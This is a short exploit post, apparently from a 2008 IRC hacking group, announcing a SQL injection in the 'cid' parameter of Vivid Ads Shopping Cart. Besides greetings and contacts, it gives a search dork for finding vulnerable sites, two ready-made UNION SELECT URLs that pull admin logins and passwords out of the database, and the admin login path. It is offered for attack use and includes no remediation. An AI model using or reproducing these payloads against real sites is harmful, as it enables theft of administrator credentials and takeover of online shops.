## Vivid Ads Shopping Cart (cid) Remote SQL Injection ## ## Discovered By : KoDoQ_GiLa@irc.mildnet.org 15/10/2008 ## HomePage : http://mildnet.org ## Thx to : Nyubi aka Solpot,home_edition2001,dead,ardan, anakbugis,kaka11,rahulx_is_back,anti_underground,che`io AND FOR ALL IRC.MILDNET.ORG COMMUNITY ################################################################################# ## Dork : "Vivid Ads Shopping Cart" ## =-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-= http://www.target.com/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin-- http://www.target.com/vivid_ads folder/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin-- ======== (AdMiN LoGiN) ======= http://www.target.com/admin/ ## Contact person : djmomo[At]live[DoT]com ## VIVA IRC.MILDNET.ORG ##